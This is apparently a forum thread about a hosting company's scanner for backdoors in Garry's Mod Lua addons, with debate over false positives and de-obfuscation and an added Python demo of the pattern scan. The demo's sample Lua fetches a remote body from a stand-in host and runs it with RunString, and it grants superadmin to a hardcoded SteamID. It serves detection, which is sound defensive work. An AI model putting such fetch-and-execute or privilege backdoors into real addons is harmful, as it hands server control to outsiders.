https://cdn.discordapp.com/attachments/418376555585077248/463799728815996938/banneridea2.png
Backdoors are becoming a more common thing which servers have to tackle, and during summer they tend to have a pretty major surge in frequency, which seems to be getting larger due to the easy access of old backdoors for skids. People have attempted to make Lua backdoor scanners before - but this turns into a constant "cat & mouse" game between the Lua-based scanner and the Lua-based backdoors.
Ideally we need something that operates outside of the Lua environment, that's easy for people to use, and fast. I believe we've made something that can help out here.
For free, you can deploy a 24 hour server, upload your addons/gamemodes you want scanning - and click the scan button in our game panel. Our scanner will help people find the following patterns in code, often used with backdoors:
SteamIDs
Arbitrary Code Execution (RunString, CompileString, etc)
External Networking (URLs used in code)
User group modification, and ULX used in strings (eg. "ulx setgroup steamid admin")
Huge indentation (often used to hide backdoors)
Console Commands
IP Tracking
& known URLs/IPs associated with backdoors which have been identified on various forums.
The massive advantage to tackling the issue from this angle is that backdoors can't interfere with the tool in Lua, like addon-based backdoor scanners work. This is totally operating outside of the server.
This system is designed to be used by people who know what they're doing, but to make their lives much easier. It's much faster than doing this yourself through grep, and it's displayed in a much more palatable form-factor. We hope that some people find this useful in identifying and removing backdoors, and if you find any please let us know, especially if they're on the workshop. If there is anything you think we've missed, then please let us know about that, too! Any workshop addon reports should also be forwarded to rubat@facepunch.com.
As a side note - If you're an addon developer that's getting a lot of complaints about legitimate code in your addon being identified as a backdoor, feel free to reach out to us, and we'll work with you to help alleviate these issues. We have added disclaimers to try & prevent this in the first place.
Here's a screenshot of the scanner to give you guys an example of what to expect:
https://owo.whats-th.is/a1314d.png
Death to backdoors \o/
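The pattern pass the post describes (SteamIDs, RunString/CompileString, URLs, user group changes, console commands, huge indentation), written up as an added example in Python; this is not Crident's scanner, the Lua sample is constructed for the demonstration, and the regexes and the indentation threshold are assumptions:

```python
import re

# Constructed Lua sample for the demo; not taken from any real addon.
SAMPLE_LUA = """\
hook.Add("PlayerInitialSpawn", "init", function(ply)
    if ply:SteamID() == "STEAM_0:1:12345678" then
        RunConsoleCommand("ulx", "adduser", ply:Nick(), "superadmin")
    end
end)
http.Fetch("http://example.invalid/payload.txt", function(body)
                                                            RunString(body)
end)
"""

# (category, regex) pairs mirroring the pattern list in the post; assumed, not Crident's rules.
PATTERNS = [
    ("steamid", re.compile(r"STEAM_[0-5]:[01]:\d+")),
    ("code_exec", re.compile(r"\b(RunString|RunStringEx|CompileString|CompileFile)\s*\(")),
    ("external_net", re.compile(r"https?://[^\s\"']+")),
    ("usergroup", re.compile(r"\b(SetUserGroup|adduser|setgroup)\b|ulx\s+(adduser|setgroup)")),
    ("concommand", re.compile(r"\b(RunConsoleCommand|ConCommand|concommand\.Run)\s*\(")),
    ("ip_tracking", re.compile(r"\bIPAddress\s*\(")),
]


def scan_lua(source, indent_threshold=40):
    """Return a list of (line_no, category, matched_text) findings for one Lua file."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        # Very deep leading whitespace is used to push code off-screen in an editor.
        indent = len(line) - len(line.lstrip(" \t"))
        if line.strip() and indent >= indent_threshold:
            findings.append((line_no, "huge_indent", f"{indent} leading whitespace chars"))
        for category, rx in PATTERNS:
            for m in rx.finditer(line):
                findings.append((line_no, category, m.group(0)))
    return findings


def categories_hit(findings):
    """Distinct categories seen, so a reviewer can triage by type rather than severity."""
    return sorted({category for _, category, _ in findings})


if __name__ == "__main__":
    for line_no, category, text in scan_lua(SAMPLE_LUA):
        print(f"line {line_no:3} {category:13} {text}")
```

As the thread notes, every hit here is a lead for a human to read in context, not a verdict: the SteamID comparison could just as well be a whitelist.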
if you are a skid host looking to steal this your mother will die in her sleep if you dont say "crident did it first"
oof
why.
just why.
Haven't tested it with actual backdoors till now and so far it works great! I added all the "backdoors" (some like commander's drm code are not backdoors, still detected tho) from this repo: https://github.com/RyanJGray/Backdoor_Busting_2015/
So far all of them are detected:
http://i.avasdemon.rocks/firefox_2018-07-03_16-35-42.png
http://i.avasdemon.rocks/firefox_2018-07-03_16-39-44.png
(tons more under)
Not to mention it was almost instant when this got detected and is lively updated so you don't have to wait for a full page load to get everything to show, just watch every backdoor get detected one by one in a few seconds.
(If ya don't believe me feel free to try on the trials \o7)
There is no backdoor when you re-code all of addons 😎
until you code a backdoor in case it gets leaked <pepe>
Looks nice.
oh hey, the coding example was done on my industrial nightmare gamemode. neato!
sorry for exposing your backdoors! as a note for anyone reading this, those are false positives on that gamemode - it was just a nice looking example screenshot lmao
it doesn't have any backdoors (last i checked), it just has a lot of steamids because the way i do whitelisting is terrible. i'm not mad or anything i just thought it was giggle worthy
Soon tm
Even though you stated that this is for people who know what they are doing, you must know that people who are clueless will still try to use it too. I think there should be a greater focus on showing what has been detected rather than a severity level. For instance, you might decide to detect the use of kick and ban functions, and you can tag those detections as "admin mod". This way, people will have a better idea of how alarmed they should be by it. An addon that isn't an admin mod being tagged as an admin mod would be a good indicator of unwanted behavior. This is probably a bad example though, as most backdoors I've seen posted on these forums try to use ulx console commands to do that sort of thing.
Also, if you aren't already, you should do something a little more comprehensive than just searching for strings. Detecting what it actually does is preferable to detecting possible obfuscation. I have a concept for a backdoor scanner that would be able to defeat most obfuscations.
Does it happen to be using a Lua tracer?
I was thinking more along the lines of parsing the Lua code and building a syntax tree. Then, simplify it as much as possible (de-obfuscation). Then, scan for bad things. It would, as a last step, run the code and check for bad things as it runs. This would be to catch attempts at trying to outsmart the de-obfuscation. I have yet to see any obfuscation that would do so, but the mere existence of the scanner would promote it. Hell, the mere existence of this very post might promote it.
Some kind of hosting on your own server would be nice.
I feel pretty unsafe uploading all my addons xD
but then how will we steal all the addons???
Well I know that you're pretty trustworthy but well I rather host stuff on my own server at home.
We're planning on releasing a guide on our forums sooner or later on the best ways to pick out actual backdoors instead of a false positive, but for now the discord we link on the page lets people join and ask freely, which is recommended.
There's an actual pro to false positives: if we whitelisted, let's say, ulx directories or something to prevent false positives, people who make backdoors will see that and try to hide their backdoors. It's better to display everything but keep a tick to allow people to see potential actual false positives than to just hide them completely. (This goes for categorizing too; you can make your backdoor look harmless by tricking the system into placing it into the "admin mod" category.)
I'm not convinced. Both of those could be found with RegEx.
_G access is very broad and undescriptive. All that means is obfuscated code is likely present. Code is often obfuscated to hide backdoors, but some people are overly paranoid about people stealing their code and will obfuscate more benign things. Your scanner would be more useful if it dove into what the obfuscated code actually does, and detected bad things. That means de-obfuscating it first.
I think there is some miscommunication on my behalf - I wasn't trying to say it doesn't search for specific strings, because it does. I thought you were saying that the detection type should be explained to the user, which we do.
This tool isn't supposed to find the backdoors for you, I'm not aware of a way you can, with 100% reliability, know what is and what isn't a backdoor. This scans your server for code which backdoors would need to use in their execution, like RunString, or hard coded SteamID's for example. This is basically a faster way than people having to grep their own addons to find a possible backdoor, while presenting the results in a more easily "digestible" form factor than an SSH/cmd window.
It sounds like your idea is pretty neat though, and I hope you end up making it - it could help a lot of people
I agree with that, but there are "unwanted behaviors" that you can detect with a high degree of certainty. For instance, finding embedded Steam IDs means that there is a high likelihood of the addon giving special treatment to specific users. Bonus points if you can detect these IDs being compared to Steam IDs returned from player entities. Obfuscated code could be anything, however, and I think giving that a "high" severity level could potentially cause some unnecessary drama in the future.
Yeah, we do detect SteamIDs, if I hadn't already said that.
This is a valid concern. We have a system in place for content creators who have legitimate usage for these. The most popular addons almost all our clients use already won't show up in the backdoor scanner, provided no one modifies the code in those addons. One key reason we made this post here is to make content creators aware so we can work with them to avoid these issues.
We don't sell unmanaged dedis, but I'm sorry you feel that way. Thanks for sharing your thoughts though.
Sorry sweetheart, I don't know what you were expecting. Because of your feedback we'll try harder in the future.
Because that isn't what we're trying to do here, this is supposed to find everything a backdoor would need to work, speeding up people who would have to search for this stuff themselves.
However we might build on it or develop a different tool that takes a different approach at a later date if enough people want it. As far as I'm aware no other hosts have done anything like this, so we're seeing what the engagement is like, and how much people actually want tools like this.
Thanks for the feedback, we'll look into developing more complex tools to address your concerns, but it's unlikely we'll remove the scanner, as that's designed to identify all possibly exploitable code on a server, for people who know what they're doing to analyse. You make it sound like your idea is easy to design, but there is a reason it's never been done before: it's not a straightforward thing to do.
The reason I might have come off as dismissive is because in Discord you were trying to get this post removed for reasons which are irrelevant to the actual post's goal, out of pure spite. You've been known to make things up about me & Crident and facilitate in spreading lies about me personally, before. As far as I'm aware, no one else is providing a tool to fight backdoors, and I agree it can be done better, so if you care so much, help out, and make something.
I doubt you will, though - because your only goal here is to try & make Crident/me look bad. I don't buy that you actually care about or believe the things you're saying.
Regardless, thanks for some actual feedback, but I would have appreciated that in your initial reply to this thread, instead of you just going straight to attack-mode:
You could set up a system that could automatically detect calls to hook.Add, net.Receive, concommand.Add, etc, and subsequently do path execution analysis to ensure non-admins are unable to abuse it, and check whether it calls Lua entry points like RunString, CompileString, etc. It has been done before.
This sounds extremely dubious. Analysis of programs is hard. I'm not the most seasoned academic, but I believe the TL;DR of Rice's Theorem is that it's really hard.
https://en.wikipedia.org/wiki/Rice%27s_theorem
The way I see it, you could spend a week building a system like this, which generates more false positives but will find most malicious code, or you could spend three months engineering some kind of bullshitmagic static/dynamic analysis system, which is either going to be too lenient (VERY BAD) or too aggressive (the same as this).
A false positive is always better than a false negative because you actually have something to go by. If someone is too dumb to interpret the results, that is their problem. You might get one or two more bitchy comments on your workshop addon out of the thousands already there. So what?
Show me any system that claims to do this perfectly and I will give you at least one false positive or false negative. I know some people here have some kind of vendetta against Crident, and I can see why, but this seems very petty.
IMO because of all the variations you could do with obfuscation at runtime, any form of static scanning is impractical. Perhaps the easiest and most effective solution would be overriding critical function calls before any addons are able to load, then using a whitelisted filtering system with the ability for users to manually allow/block calls in some sort of panel.